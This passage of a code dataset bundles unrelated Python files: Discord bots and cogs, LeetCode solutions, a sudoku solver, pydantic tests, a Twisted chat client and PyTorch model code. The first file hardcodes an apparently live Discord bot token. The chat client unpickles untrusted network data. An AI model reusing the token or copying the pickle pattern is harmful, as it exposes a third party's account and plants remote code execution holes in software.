lástima. Aunque buen gusto para el anime.\")\r\n@bot.command()\r\nasync def saul(ctx):\r\n    await ctx.send(\"De forma unánime creemos que es el más confiable, aunque sea un rompehuevos de Jojo's.\")\r\n@bot.command()\r\nasync def gaston(ctx):\r\n    await ctx.send(\"Un talentoso que puede jugar al Counter sin mouse, un distinto.\")\r\n\r\n#YOUTUBE\r\n@bot.command()\r\nasync def yt(ctx, *, search):\r\n    #these are the words the user is searching for\r\n    query_string = parse.urlencode({'search_query': search})\r\n    #we make the request to youtube\r\n    html_content = request.urlopen(\"http://www.youtube.com/results?\" + query_string)\r\n    #we extract the video ids and get a list back\r\n    search_results = re.findall(r\"watch\\?v=(\\S{11})\", html_content.read().decode())\r\n    #we send only the first result\r\n    await ctx.send('https://www.youtube.com/watch?v=' + search_results[0])\r\n\r\n#event\r\n#this event tells us that the bot is ready\r\n@bot.event\r\nasync def on_ready():\r\n    #we can configure the bot to show that we are streaming, like this: \r\n    #await bot.change_presence(activity=discord.Streaming(name=\"Tutorial\", url=\"http://www.twitch.tv/accountname\"))\r\n    print(\"My bot is ready\")\r\n\r\n#run it\r\n#but this \"run\" needs a token that we take from the discord application\r\nbot.run(\"NzUwMTExMjAzNDQ3MTQ0NDQ4.X01xfw.W7hwjATDQ9R2NJ_XYsaUQw0pJ3g\")","repo_name":"MateoIfran/discordbot","sub_path":"index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":4948,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2071871663","text":"class Solution(object):\n    def isSubtree(self, s, t):\n        \"\"\"\n        :type s: TreeNode\n        :type t: TreeNode\n        :rtype: bool\n        \"\"\" \n        if not s: return False\n        def isSameTree(p, q):\n            if not p and not q: return True\n            if not p or not q: return False\n            if p.val != q.val: return False\n            return isSameTree(p.left, q.left) and isSameTree(p.right, q.right)\n        \n        return isSameTree(s, t) or self.isSubtree(s.left, t) or self.isSubtree(s.right, t)\n    \n\n#Use a helper function \"check\"\nclass Solution(object):\n    def isSubtree(self, s, t):\n        \"\"\"\n        :type s: TreeNode\n        :type t: TreeNode\n        :rtype: bool\n        \"\"\"\n        \n        if not s and not t:\n            return True\n        if not s or not t:\n            return False\n        \n        if self.check(s,t):\n            return True\n        \n        return self.isSubtree(s.left, t) or self.isSubtree(s.right, t)\n    \n    def check(self, s, t):\n        if not s and not t:\n            return True\n        if not s or not t:\n            return False \n        if s.val != t.val:\n            return False\n        return self.check(s.left, t.left) and self.check(s.right, t.right)\n\n#use preorder traversal to generate a string\nclass Solution(object):\n    def isSubtree(self, s, t):\n        \"\"\"\n        :type s: TreeNode\n        :type t: TreeNode\n        :rtype: bool\n        \"\"\"\n        sstr = ''\n        for x in self.preorder(s):\n            sstr += str(x.val)\n        \n        \n        tstr = ''\n        for x in self.preorder(t):\n            tstr += str(x.val)\n        \n        return tstr in sstr\n    \n    def preorder(self, node):\n        if node:\n            yield TreeNode('#') #represent start of a subtree\n            yield node\n            for x in self.preorder(node.left): yield x\n            for x in self.preorder(node.right): yield x\n            yield TreeNode('*') #represent leaf end\n        \n","repo_name":"mcfair/Algo","sub_path":"Tree/572. Subtree of Another Tree.py","file_name":"572. 
Subtree of Another Tree.py","file_ext":"py","file_size_in_byte":1970,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"35452417805","text":"\n# https://leetcode-cn.com/problems/move-zeroes/\n\nfrom typing import List\n\nclass Solution:\n    def moveZeroes(self, nums: List[int]) -> None:\n        \"\"\"\n        Do not return anything, modify nums in-place instead.\n        \"\"\"\n\n        raw_len = len(nums)\n        while 0 in nums:\n            nums.remove(0)\n        filter_len = len(nums)\n        for i in range(raw_len - filter_len):\n            nums.append(0)\n\n\ns = Solution()\nprint(s.moveZeroes(nums=[0,1,0,3,12]))","repo_name":"azhu51/leetcode-practice","sub_path":"top_interview/easy_array_283.py","file_name":"easy_array_283.py","file_ext":"py","file_size_in_byte":426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27709290472","text":"\n\n\n#Chosen assignment is: writing words counter\ndef wordCount(file):\n    counter = {}\n    with open(file, 'r') as f:\n        text = \"\".join(f.readlines())\n        for sentence in text.split('\\n'):\n            for textWord in sentence.split():\n                counter[textWord] = counter.get(textWord,0) + 1\n    return counter\n\nprint(wordCount(\"words.txt\"))","repo_name":"Sagiv648/college-work","sub_path":"python/7_6-12-22/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"1504582884","text":"import imp\nimport os\nimport time\nclass Table():\n    # Size = N x N\n    def __init__(self):\n        self.size = 9\n        self.table = self.create_table()\n\n    \n    # Getters n' Setters\n    def get_table(self):\n        return self.table\n    \n    def get_positions(self, number):\n        positions = []\n        for pos_line, line in enumerate(self.table):\n            for pos_item, item in enumerate(line):\n                if item == number:\n                    positions.append((pos_line, pos_item))\n        \n        return positions\n    \n    def get_number(self, position):\n        return self.table[position[0]][position[1]]\n\n    def set_number(self, position, number):\n        self.table[position[0]][position[1]] = number\n\n    # Methods\n    def create_table(self):\n        table = []\n\n        for i in range(self.size):\n            line = []\n            for c in range(self.size):\n                line.append(0)\n            \n            table.append(line)\n        \n        return table\n\n    def table_to_string(self):\n        string = \"\"\n        for pl, line in enumerate(self.table):\n            for pos, cell in enumerate(line):\n                if (((pos + 1) % 3) == 0) and ((pos + 1) != 9):\n                    string += f\"{cell} | \"\n                else:\n                    string += f\"{cell} \"\n            if ((pl + 1) % 3) == 0 and ((pl + 1) != 9):\n                string += \"\\n------X-------X------\\n\"\n            else:\n                string += \"\\n\"\n\n        return string\n\n    def number_is_valid(self, r, c, k):\n        not_in_row = k not in self.table[r]\n        not_in_column = k not in [self.table[i][c] for i in range(0, self.size)]\n        \n        subgrid_rows_range = range(r//3*3, r//3*3+3)\n        subgrid_cols_range = range(c//3*3, c//3*3+3)\n\n        not_in_box = k not in [ self.table[i][j] for i in subgrid_rows_range for j in subgrid_cols_range] \n\n        return (not_in_row and not_in_column and not_in_box)\n\n    def solve(self, r=0, c=0):\n        os.system('cls' if os.name == 'nt' else 'clear')\n        print(self.table_to_string())\n        if r == self.size:\n            # Checking whether we moved past the last row\n            return True\n        elif c == self.size:\n            # Checking whether we passed the last column item, moving down a row\n            return self.solve(r+1, 0)\n        elif self.table[r][c] != 0:\n            # Skipping the cell because it is already filled\n            return self.solve(r, c+1)\n        else:\n            # Trying every possible number from 1 to 9\n            for k in range(1, self.size + 1):\n                if self.number_is_valid(r, c, k):\n                    self.table[r][c] = k\n\n                    if self.solve(r, c+1):\n                        return True\n                    self.table[r][c] = 0\n            return False\n    ","repo_name":"duvrdx/sudoku_solver","sub_path":"python/TableSolverV2.py","file_name":"TableSolverV2.py","file_ext":"py","file_size_in_byte":2813,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"74529529447","text":"# ideal-shock-test.py\n#\n# $ prep-gas ideal-air.inp ideal-air-gas-model.lua\n# $ python3 ideal-shock-test.py\n#\n# PJ, 2019-11-28\n# \nimport math\nfrom eilmer.gas import GasModel, GasState, GasFlow\n\ngmodel = GasModel('ideal-air-gas-model.lua')\nstate1 = GasState(gmodel)\nstate1.p = 125.0e3 # Pa\nstate1.T = 300.0 # K\nstate1.update_thermo_from_pT()\nstate1.update_sound_speed()\nprint(\"state1: %s\" % state1)\nprint(\"normal shock (in ideal gas), given shock speed\")\nvs = 2414.0\nstate2 = GasState(gmodel)\nflow = GasFlow(gmodel)\nv2, vg = flow.ideal_shock(state1, vs, state2)\nprint(\"v2=%g vg=%g\" % (v2, vg))\nprint(\"state2: %s\" % state2)\n","repo_name":"lkampoli/Eilmer4","sub_path":"examples/gasdyn/ideal-shock-test.py","file_name":"ideal-shock-test.py","file_ext":"py","file_size_in_byte":621,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"18067488603","text":"import discord\n\n\nasync def output(ctx, lists: list[str], title: str, ephemeral):\n    embed = discord.Embed(title=title,\n                          type=\"rich\",\n                          colour=discord.Colour.from_rgb(0, 0, 0)\n                          )\n\n    for content in lists:\n        embed.add_field(name=\"-\",\n                        value=content,\n                        inline=False)\n\n    await ctx.respond(content=\"\", embeds=[embed], ephemeral=ephemeral)\n\n\nasync def print(ctx, content: str, entries: list, title: str = None, ephemeral=True):\n    data = []\n    for entry in entries:\n        if len(content + entry) > 1000:\n            data.append(content)\n            content = entry\n            if len(data) == 4:\n                await output(ctx, data, title, True)\n                data = []\n        else:\n            content += \"\\n\" + entry\n    data.append(content)\n    await output(ctx, data, title, ephemeral)\n","repo_name":"jaimevisser/scrimbot","sub_path":"scrimbot/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":923,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"53"} +{"seq_id":"13422087146","text":"#coding:utf-8\r\nimport pygame \r\nwindowResolution = (640,480)\r\npygame.init()\r\npygame.display.set_caption(\"Les evenements\")\r\nwindowSurface = pygame.display.set_mode(windowResolution,pygame.RESIZABLE)\r\narialfont = pygame.font.SysFont(\"arial\",30)\r\nwhiteColor = (255,255,255)\r\nblackColor = (0,0,0)\r\ndimentisionText = arialfont.render(\"{}\".format(windowResolution),True,whiteColor)\r\nwindowSurface.blit(dimentisionText,[20,10])\r\npygame.display.flip()\r\nlaunched = True\r\nwhile launched :\r\n    for event in pygame.event.get():\r\n        if event.type == pygame.QUIT:\r\n            launched = False\r\n        elif event.type == pygame.VIDEORESIZE:\r\n            windowSurface.fill(blackColor)\r\n            dimentisionText = arialfont.render(\"{}x{}\".format(event.w , event.h),True,whiteColor)\r\n            windowSurface.blit(dimentisionText,[20,10])\r\n            pygame.display.flip()\r\n            launched = True\r\n        elif event.type == pygame.KEYDOWN:\r\n            if event.key == pygame.K_UP:\r\n                print(\"haut\")\r\n            elif event.key == pygame.K_DOWN:\r\n                print(\"bas\")\r\n        elif event.type == pygame.MOUSEMOTION:\r\n            print(\"{}\".format(event.pos))\r\n            
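# (editor's sketch, not in the original file) mouse clicks could be handled with\r\n        # one more branch in the same pattern:\r\n        # elif event.type == pygame.MOUSEBUTTONDOWN:\r\n        #     print(event.button, event.pos)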
\r\n\r\n\r\n","repo_name":"CherifaHamroun/python-project","sub_path":"Cours/Evenements.py","file_name":"Evenements.py","file_ext":"py","file_size_in_byte":1200,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4081850323","text":"from single_stage_model.dataset.kitti import KittiDataset\nimport sys\nsys.path.append(\"/media/ubuntu-502/pan1/liang/PVRCNN-V1.1/single_stage_model/dataset\")\ntry:\n from single_stage_model.dataset.leishen_dataset.LSDataset import LeiShenDataset\nexcept:\n from ..dataset.leishen_dataset.LSDataset import LeiShenDataset\n\nimport torch\nfrom torch.utils.data import DataLoader\n\n# from single_stage_model.configs.single_stage_config import cfg\n\ndef build_data_loader(cfg,batch_size=1,num_workers=2,training=True,split=\"train\",logger=None,args=None,train_all=None,dist=False):\n if cfg.get(\"LEISHEN\",None) is None:\n dataset = KittiDataset(datapath=cfg.DATA_DIR,\n class_name=cfg.CLASS_NAMES,\n training=training,\n split=split,\n #split = cfg.MODEL[\"TRAIN\" if training else \"TEST\"].SPLIT,\n logger= logger,\n args =args,\n train_all=train_all,\n )\n else:\n dataset = LeiShenDataset(datapath=cfg.DATA_DIR,\n class_name=cfg.CLASS_NAMES,\n training=training,\n split=split,\n #split = cfg.MODEL[\"TRAIN\" if training else \"TEST\"].SPLIT,\n logger= logger,\n args =args,\n train_all=train_all,\n )\n sampler = torch.utils.data.distributed.DistributedSampler(dataset) if dist else None\n dataloader = DataLoader(dataset=dataset,\n batch_size=batch_size,\n pin_memory=True,\n num_workers=num_workers,\n shuffle=(sampler is None) and training,\n collate_fn=dataset.collate_batch,\n drop_last=False,\n sampler=sampler,\n timeout=0\n )\n return dataset,dataloader,sampler","repo_name":"liangzhao123/IOU-SSD","sub_path":"single_stage_model/dataset/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":2176,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"29053841234","text":"import asyncio\nimport platform\nimport random\n\nimport discord\nfrom discord.ext import commands\n\n\nclass Misc(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n\n @commands.Cog.listener()\n async def on_ready(self):\n print(f\"{self.__class__.__name__} Cog has been loaded\\n-----\")\n\n @commands.command(\n name=\"stats\", description=\"A useful command that displays bot statistics.\"\n )\n async def stats(self, ctx):\n pythonVersion = platform.python_version()\n dpyVersion = discord.__version__\n serverCount = len(self.bot.guilds)\n memberCount = len(set(self.bot.get_all_members()))\n\n embed = discord.Embed(\n title=f\"{self.bot.user.name} Stats\",\n description=\"\\uFEFF\",\n colour=ctx.author.colour,\n timestamp=ctx.message.created_at,\n )\n\n embed.add_field(name=\"Bot Version:\", value=self.bot.version)\n embed.add_field(name=\"Python Version:\", value=pythonVersion)\n embed.add_field(name=\"Discord.Py Version\", value=dpyVersion)\n # noinspection PyTypeChecker\n embed.add_field(name=\"Total Guilds:\", value=serverCount)\n # noinspection PyTypeChecker\n embed.add_field(name=\"Total Users:\", value=memberCount)\n embed.add_field(name=\"Bot Developers:\", value=\"<@380153305394839554>\")\n\n embed.set_footer(text=f\"Zero Two | {self.bot.user.name}\")\n embed.set_author(name=self.bot.user.name, icon_url=self.bot.user.avatar_url)\n\n await ctx.send(embed=embed)\n\n @commands.command(\n name=\"echo\",\n description=\"A simple command that repeats the users 
input back to them.\",\n    )\n    async def echo(self, ctx):\n        await ctx.message.delete()\n        embed = discord.Embed(\n            title=\"Please tell me what you want me to repeat!\",\n            description=\"||This request will timeout after 1 minute.||\",\n        )\n        sent = await ctx.send(embed=embed)\n\n        try:\n            msg = await self.bot.wait_for(\n                \"message\",\n                timeout=60,\n                check=lambda message: message.author == ctx.author\n                and message.channel == ctx.channel,\n            )\n            if \"@everyone\" in msg.content:\n                await ctx.send(\"Nice Try!\")\n                await sent.delete()\n                await msg.delete()\n                return\n            elif msg:\n                await sent.delete()\n                await msg.delete()\n                await ctx.send(msg.content)\n        except asyncio.TimeoutError:\n            await sent.delete()\n            await ctx.send(\"Cancelling\", delete_after=10)\n\n    @commands.command(\n        name=\"toggle\", description=\"Enable or disable a command!\"\n    )\n    @commands.is_owner()\n    async def toggle(self, ctx, *, command):\n        command = self.bot.get_command(command)\n\n        if command is None:\n            await ctx.send(\"I can't find a command with that name!\")\n\n        elif ctx.command == command:\n            await ctx.send(\"You cannot disable this command.\")\n\n        else:\n            command.enabled = not command.enabled\n            ternary = \"enabled\" if command.enabled else \"disabled\"\n            await ctx.send(f\"I have {ternary} {command.qualified_name} for you!\")\n\n    @commands.command(\n        name='ping', description='Gets the bots Ping!'\n\n    )\n    async def ping(self, ctx):\n        await ctx.send(f'Pong! {round(self.bot.latency * 1000)}ms')\n\n    @commands.command(name='avatar', description='Steals someones Avatar', aliases=['av'])\n    async def avatar(self, ctx, *, member: discord.Member = None):\n        if not member:\n            member = ctx.message.author\n        userAvatar = member.avatar_url\n        await ctx.send(userAvatar)\n\n    @commands.command(name='serverinfo', description='Shows you the Serverinfo')\n    async def serverinfo(self, ctx):\n        name = str(ctx.guild.name)\n        description = str(ctx.guild.description)\n\n        owner = str(ctx.guild.owner)\n        iD = str(ctx.guild.id)\n        region = str(ctx.guild.region)\n        memberCount = str(ctx.guild.member_count)\n        icon = str(ctx.guild.icon_url)\n        embed = discord.Embed(\n            title=name + \" Server Information\",\n            description=description,\n            color=random.choice(self.bot.color_list)\n        )\n        embed.set_thumbnail(url=icon)\n        embed.add_field(name=\"Owner\", value=owner, inline=True)\n        embed.add_field(name=\"Server ID\", value=iD, inline=True)\n        embed.add_field(name=\"Region\", value=region, inline=True)\n        embed.add_field(name=\"Member Count\", value=memberCount, inline=True)\n        await ctx.send(embed=embed)\n\n\ndef setup(bot):\n    bot.add_cog(Misc(bot))\n","repo_name":"imwood04/Bot02","sub_path":"cogs/misc.py","file_name":"misc.py","file_ext":"py","file_size_in_byte":4742,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"42872726319","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n\"\"\"\ncomprehension exercises\na list comprehension builds a list to a given specification\n\"\"\"\n\nfrom common import *\n\n\n# Write a function that takes a list and returns all of its strings uppercased; non-string elements are ignored.\ndef to_uppers(org):\n    return [x.upper() for x in org if isinstance(x, str)]\n\n\n# Find the symmetric (palindromic) 3-digit numbers. For example, 121 is symmetric.\ndef symmetry():\n    return [x * 100 + y * 10 + x for x in range(1, 10) for y in range(0, 10)]\n\n\ndef demo():\n    # 1-100, printing out the multiples of 7\n    rst = [x for x in range(1, 101) if x % 7 == 0]\n    # Generate the list [1x2, 3x4, 5x6, 7x8, ..., 99x100]\n    rst = [x * (x + 1) for x in range(1, 100, 2)]\n    print(to_uppers(['Hello', 'world', 101]))\n    print(symmetry())\n\n\ndef main():\n    try:\n        try:\n            demo()\n        except Exception as e:\n            raise 
Usage(e)\n except Usage as usg:\n Usage.show_info()\n return -1\n\n\nif __name__ == \"__main__\":\n sys.exit(main())\n","repo_name":"Jjunxi/EXERCISES","sub_path":"comprehension.py","file_name":"comprehension.py","file_ext":"py","file_size_in_byte":1017,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"27477627670","text":"from __future__ import annotations\nfrom typing import TYPE_CHECKING\nfrom discord.ext import commands\nimport os\nimport discord\n\nif TYPE_CHECKING:\n from main import Saita\n\n\nclass Owner(commands.Cog):\n 'This cog has commands for the bot developer.'\n\n def __init__(self, bot: Saita):\n self.bot: Saita = bot\n\n def im_developer(interaction: discord.Interaction):\n return interaction.user.id == interaction.client.application.owner.id\n\n color = 2829617\n\n @discord.app_commands.command(\n name='reload',\n description='Reload all cogs.'\n )\n @discord.app_commands.check(im_developer)\n async def reload(self, interaction: discord.Interaction):\n embed = discord.Embed(color=self.color)\n\n for file in os.listdir('./cogs'):\n try:\n if file.endswith('.py'):\n await self.bot.reload_extension(f'cogs.{file[:-3]}')\n except commands.ExtensionError as error:\n embed.description = '{}: {}'.format(\n type(error).__name__, error)\n\n break\n else:\n embed.description = '**All cogs has been reloaded.**'\n\n await interaction.response.send_message(embed=embed)\n\n\nasync def setup(bot: commands.Bot):\n await bot.add_cog(Owner(bot))\n","repo_name":"guillejabase/saitabot-py","sub_path":"cogs/owner.py","file_name":"owner.py","file_ext":"py","file_size_in_byte":1309,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"41988803074","text":"import json\nimport pickle\nfrom typing import List, Tuple, Union\n\nimport pytest\n\nfrom pydantic import BaseModel, Field, Protocol, ValidationError, parse_obj_as\n\n\nclass Model(BaseModel):\n a: float\n b: int = 10\n\n\ndef test_obj():\n m = Model.parse_obj(dict(a=10.2))\n assert str(m) == 'a=10.2 b=10'\n\n\ndef test_parse_obj_fails():\n with pytest.raises(ValidationError) as exc_info:\n Model.parse_obj([1, 2, 3])\n assert exc_info.value.errors() == [\n {'loc': ('__root__',), 'msg': 'Model expected dict not list', 'type': 'type_error'}\n ]\n\n\ndef test_parse_obj_submodel():\n m = Model.parse_obj(Model(a=10.2))\n assert m.dict() == {'a': 10.2, 'b': 10}\n\n\ndef test_parse_obj_wrong_model():\n class Foo(BaseModel):\n c = 123\n\n with pytest.raises(ValidationError) as exc_info:\n Model.parse_obj(Foo())\n assert exc_info.value.errors() == [{'loc': ('a',), 'msg': 'field required', 'type': 'value_error.missing'}]\n\n\ndef test_parse_obj_root():\n class MyModel(BaseModel):\n __root__: str\n\n m = MyModel.parse_obj('a')\n assert m.dict() == {'__root__': 'a'}\n assert m.__root__ == 'a'\n\n\ndef test_parse_root_list():\n class MyModel(BaseModel):\n __root__: List[str]\n\n m = MyModel.parse_obj(['a'])\n assert m.dict() == {'__root__': ['a']}\n assert m.__root__ == ['a']\n\n\ndef test_parse_nested_root_list():\n class NestedData(BaseModel):\n id: str\n\n class NestedModel(BaseModel):\n __root__: List[NestedData]\n\n class MyModel(BaseModel):\n nested: NestedModel\n\n m = MyModel.parse_obj({'nested': [{'id': 'foo'}]})\n assert isinstance(m.nested, NestedModel)\n assert isinstance(m.nested.__root__[0], NestedData)\n\n\ndef test_parse_nested_root_tuple():\n class NestedData(BaseModel):\n id: str\n\n class NestedModel(BaseModel):\n __root__: 
Tuple[int, NestedData]\n\n class MyModel(BaseModel):\n nested: List[NestedModel]\n\n data = [0, {'id': 'foo'}]\n m = MyModel.parse_obj({'nested': [data]})\n assert isinstance(m.nested[0], NestedModel)\n assert isinstance(m.nested[0].__root__[1], NestedData)\n\n nested = parse_obj_as(NestedModel, data)\n assert isinstance(nested, NestedModel)\n\n\ndef test_parse_nested_custom_root():\n class NestedModel(BaseModel):\n __root__: List[str]\n\n class MyModel(BaseModel):\n __root__: NestedModel\n\n nested = ['foo', 'bar']\n m = MyModel.parse_obj(nested)\n assert isinstance(m, MyModel)\n assert isinstance(m.__root__, NestedModel)\n assert isinstance(m.__root__.__root__, List)\n assert isinstance(m.__root__.__root__[0], str)\n\n\ndef test_json():\n assert Model.parse_raw('{\"a\": 12, \"b\": 8}') == Model(a=12, b=8)\n\n\ndef test_json_ct():\n assert Model.parse_raw('{\"a\": 12, \"b\": 8}', content_type='application/json') == Model(a=12, b=8)\n\n\ndef test_pickle_ct():\n data = pickle.dumps(dict(a=12, b=8))\n assert Model.parse_raw(data, content_type='application/pickle', allow_pickle=True) == Model(a=12, b=8)\n\n\ndef test_pickle_proto():\n data = pickle.dumps(dict(a=12, b=8))\n assert Model.parse_raw(data, proto=Protocol.pickle, allow_pickle=True) == Model(a=12, b=8)\n\n\ndef test_pickle_not_allowed():\n data = pickle.dumps(dict(a=12, b=8))\n with pytest.raises(RuntimeError):\n Model.parse_raw(data, proto=Protocol.pickle)\n\n\ndef test_bad_ct():\n with pytest.raises(ValidationError) as exc_info:\n Model.parse_raw('{\"a\": 12, \"b\": 8}', content_type='application/missing')\n assert exc_info.value.errors() == [\n {'loc': ('__root__',), 'msg': 'Unknown content-type: application/missing', 'type': 'type_error'}\n ]\n\n\ndef test_bad_proto():\n with pytest.raises(ValidationError) as exc_info:\n Model.parse_raw('{\"a\": 12, \"b\": 8}', proto='foobar')\n assert exc_info.value.errors() == [{'loc': ('__root__',), 'msg': 'Unknown protocol: foobar', 'type': 'type_error'}]\n\n\ndef test_file_json(tmpdir):\n p = tmpdir.join('test.json')\n p.write('{\"a\": 12, \"b\": 8}')\n assert Model.parse_file(str(p)) == Model(a=12, b=8)\n\n\ndef test_file_json_no_ext(tmpdir):\n p = tmpdir.join('test')\n p.write('{\"a\": 12, \"b\": 8}')\n assert Model.parse_file(str(p)) == Model(a=12, b=8)\n\n\ndef test_file_json_loads(tmp_path):\n def custom_json_loads(*args, **kwargs):\n data = json.loads(*args, **kwargs)\n data['a'] = 99\n return data\n\n class Example(BaseModel):\n a: int\n\n class Config:\n json_loads = custom_json_loads\n\n p = tmp_path / 'test_json_loads.json'\n p.write_text('{\"a\": 12}')\n\n assert Example.parse_file(p) == Example(a=99)\n\n\ndef test_file_pickle(tmpdir):\n p = tmpdir.join('test.pkl')\n p.write_binary(pickle.dumps(dict(a=12, b=8)))\n assert Model.parse_file(str(p), allow_pickle=True) == Model(a=12, b=8)\n\n\ndef test_file_pickle_no_ext(tmpdir):\n p = tmpdir.join('test')\n p.write_binary(pickle.dumps(dict(a=12, b=8)))\n assert Model.parse_file(str(p), content_type='application/pickle', allow_pickle=True) == Model(a=12, b=8)\n\n\ndef test_const_differentiates_union():\n class SubModelA(BaseModel):\n key: str = Field('A', const=True)\n foo: int\n\n class SubModelB(BaseModel):\n key: str = Field('B', const=True)\n foo: int\n\n class Model(BaseModel):\n a: Union[SubModelA, SubModelB]\n\n m = Model.parse_obj({'a': {'key': 'B', 'foo': 3}})\n assert isinstance(m.a, 
SubModelB)\n","repo_name":"jochenvdv/snakepack","sub_path":"tests/acceptance/subjects/pydantic/tests/test_parse.py","file_name":"test_parse.py","file_ext":"py","file_size_in_byte":5396,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"24992786003","text":"import pickle\nimport sys\n\nfrom rich.console import Console\nfrom rich.markdown import Markdown\nfrom rich.prompt import IntPrompt, Prompt\nfrom twisted.internet import reactor\nfrom twisted.internet.endpoints import TCP4ClientEndpoint\nfrom twisted.internet.protocol import Protocol\nfrom twisted.internet.protocol import ReconnectingClientFactory as BaseClientFactory\n\nfrom utility import Message\n\n\nclass Client(Protocol):\n def __init__(self, console):\n self.STDOUT = console\n\n reactor.callInThread(self.send_message)\n\n def dataReceived(self, data):\n message = pickle.loads(data)\n if message.mtype == \"MSG\":\n self.STDOUT.rule(message.msg)\n elif message.mtype == \"MD\":\n md = Markdown(message.msg)\n self.STDOUT.print(\n f\"[bold][red]\\[{message.timestamp.strftime('%H:%M')}][/][green]\\[{message.author}][/][/]\"\n )\n self.STDOUT.print(md)\n else:\n self.STDOUT.print(str(message))\n\n def send_message(self):\n while True:\n # msg = input()\n\n _msg = []\n line = \" \"\n while line != \"\":\n line = input()\n _msg.append(line)\n\n msg = \"\\n\".join(_msg).strip()\n message = Message(msg, mtype=\"MD\").encode_msg()\n self.transport.write(message)\n\n\nclass ClientFactory(BaseClientFactory):\n def __init__(self, console: Console):\n self.console = console\n\n def buildProtocol(self, addr):\n return Client(self.console)\n\n def clientConnectionFailed(self, connector, reason):\n print(reason)\n BaseClientFactory.clientConnectionFailed(self, connector, reason)\n\n def clientConnectionLost(self, connector, reason):\n print(reason)\n BaseClientFactory.clientConnectionLost(self, connector, reason)\n\n\nif __name__ == \"__main__\":\n endpoint = TCP4ClientEndpoint(reactor, \"localhost\", 9999)\n\n console = Console()\n clFactory = ClientFactory(console)\n\n endpoint.connect(clFactory)\n reactor.run()\n","repo_name":"SparshChaurasia/ChatAppRewrite","sub_path":"client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":2057,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"31173494035","text":"import math\nimport os\nimport torch\nfrom torch import nn, einsum\nfrom torchvision import models\nimport torch.nn.functional as F\nfrom einops import rearrange, repeat\n\nfrom lib.backbone import *\nfrom pretrainedmodels import se_resnext50_32x4d, resnet50, resnet34\n\npre_trained_backbone = '../ckpt/pre_trained_backbone'\nmobilenet_path = os.path.join(pre_trained_backbone, 'mobilenet', 'mobilenetv3-large-1cd25616.pth' )\n\ndef weight_xavier_init(*models):\n for model in models:\n for module in model.modules():\n if isinstance(module, nn.Conv2d) or isinstance(module, nn.Linear):\n nn.init.xavier_normal_(module.weight)\n # nn.init.orthogonal_(module.weight)\n # nn.init.kaiming_normal_(module.weight)\n if module.bias is not None:\n module.bias.data.zero_()\n elif isinstance(module, nn.BatchNorm2d):\n module.weight.data.fill_(1)\n module.bias.data.zero_()\n\n\nclass BatchNorm1d_GNN(nn.BatchNorm1d):\n '''Batch normalization over features'''\n\n def __init__(self, num_features):\n super(BatchNorm1d_GNN, self).__init__(num_features)\n\n def forward(self, x):\n return super(BatchNorm1d_GNN, self).forward(x.permute(0, 2, 
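# [editor's sketch -- not from this repo] Why BatchNorm1d_GNN permutes its input:
# torch.nn.BatchNorm1d expects (batch, channels, length), while graph node features
# usually arrive as (batch, num_nodes, channels), so channels are moved to dim 1.
import torch
import torch.nn as nn

x = torch.randn(8, 100, 16)                   # (batch, nodes, features)
bn = nn.BatchNorm1d(16)                       # normalizes the feature dimension
y = bn(x.permute(0, 2, 1)).permute(0, 2, 1)   # back to (batch, nodes, features)
print(y.shape)                                # torch.Size([8, 100, 16])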
1)).permute(0, 2, 1)\n\n\nclass Encoder_AE(nn.Module):\n def __init__(self,\n in_dim=None,\n out_dim=16,\n heads=1,\n mv=3\n ):\n super(Encoder_AE, self).__init__()\n if in_dim is None:\n in_dim = {'q': 256, 'z': 512, 'k': 1024}\n self.multi_heads = heads\n self.cross_views = mv\n self.label_coef = nn.Parameter(torch.eye(out_dim))\n\n self.k = nn.Conv2d(in_dim['k'], out_dim, 3, padding=1, bias=True)\n self.z = nn.Conv2d(in_dim['z'], out_dim * heads, 3, padding=1, bias=True)\n self.q = nn.Conv2d(in_dim['q'], out_dim, 3, padding=1, bias=True)\n\n def forward(self, x):\n b, _, kh, kw = x['k'].size()\n b, _, zh, zw = x['z'].size()\n b, _, qh, qw = x['q'].size() # qh = 2*zh = 4*kh\n\n m = self.multi_heads\n cv = int(self.cross_views)\n\n K = [repeat(self.view_aug(self.k(self.view_aug(x['k'], i, False)), i, True).reshape(b, 1, 1, kh * kw, -1),\n 'b v c i j -> b v (y c) i j', y=m)\n for i in range(cv)]\n K = torch.cat(K, 1) # b, 4, m kh*kw -1\n\n Q = self.q(x['q'])\n Z = self.z(x['z'])\n\n b, v, m, n, d = K.size()\n Ks = K.reshape(b, n, v, m * d).reshape(b, v * m * d, kh, kw)\n\n Zs = F.interpolate(Z, (qh, qw), mode='bilinear', align_corners=False)\n Ks = F.interpolate(Ks, (qh, qw), mode='bilinear', align_corners=False)\n QZK = torch.cat((Q, Zs, Ks), 1)\n\n Q = Q.reshape(b, 1, 1, qh * qw, -1)\n Q = repeat(Q, 'b v c i j -> b (x v) (y c) i j', x=cv, 